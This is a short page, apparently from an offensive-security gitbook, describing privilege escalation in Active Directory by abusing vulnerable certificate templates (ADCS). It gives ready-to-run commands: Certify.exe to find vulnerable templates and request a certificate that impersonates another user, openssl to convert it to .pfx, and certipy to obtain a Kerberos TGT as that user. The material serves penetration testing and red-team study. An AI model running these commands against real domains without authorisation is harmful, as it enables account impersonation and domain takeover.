LDAP - Privileges Escalation

A list of LDAP Privileges Escalation Techniques.

ADCS: Active Directory Certificate Services

A list of privileges techniques for ADCS.

Certificate Template Exploit

Certificate templates in ADCS (Active Directory Certificate Services) are pre-configured templates that define the parameters for a particular type of certificate that can be issued by the certificate authority (CA).

We can use Certify.exe to find vulnerable certificate template.

.\Certify.exe find /vulnerable

Request a new certificate with the vulnerable template and try to impersonate.

.\Certify.exe request /ca:<AD-CA_name> /template:<Template_name> /altname:<user_you_want_to_impersonate>

This will produce a cert.pem. Use openssl to convert it into .pfx.

# get cert.pfx
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Now ask the TGT using Certipy.

certipy auth -pfx cert.pfx -dc-ip <DC_IP> -u '<user_you_want_to_impersonate>' -domain <domain_name>

💡You can find more information about this subject at links below:
0xalwayslucky Gitbook
Hacktricks

ADCS privesc Ressources

Hacktricks Books ADCS section ;
Certify: tool to enumerate and abuse misconfigurations in ADCS ;
PKINITools: some utilities for playing with PKINIT and certificates.

PreviousLDAP - Lateralization NextPrivileges Escalation

Last updated 1 year ago